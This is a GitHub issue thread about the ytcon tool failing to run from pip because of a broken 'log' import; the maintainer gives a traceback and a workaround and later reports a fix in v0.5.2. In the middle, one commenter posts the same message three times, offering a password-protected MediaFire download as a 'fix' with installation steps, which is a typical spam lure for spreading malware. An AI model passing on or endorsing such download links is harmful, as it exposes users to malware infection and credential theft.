### ISSUE TITLE
YTCON is not running from pip: ModuleNotFoundError: No module named 'log'

### ISSUE THREAD

**Issue by NikitaBeloglazov** [NikitaBeloglazov/ytcon#9]
## Bug info / steps to reproduce / versions
Unable to run from pip and pipx. This is due to the fact that I screwed up when writing imports.

Affected versions: [v0.5.0](https://github.com/NikitaBeloglazov/ytcon/releases/tag/v0.5.0) - [v0.5.1.1](https://github.com/NikitaBeloglazov/ytcon/releases/tag/v0.5.1.1) (newest)

Clone & run from master branch still works
```bash
git clone https://github.com/NikitaBeloglazov/ytcon && cd ytcon/src/ytcon && python3 yt.py
```

Bug found by @dgudim (thanks 🙏🙏)

## Full Traceback:
```python3
Traceback (most recent call last):
  File "/home/linux/.local/bin/ytcon", line 5, in <module>
    from ytcon import yt
  File "/home/linux/.local/lib/python3.11/site-packages/ytcon/yt.py", line 64, in <module>
    from log import init_logger, journal, logger
ModuleNotFoundError: No module named 'log'
```

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by NikitaBeloglazov** [comment]
## ✅ Fixed in [v0.5.2](https://github.com/NikitaBeloglazov/ytcon/releases/tag/v0.5.2)
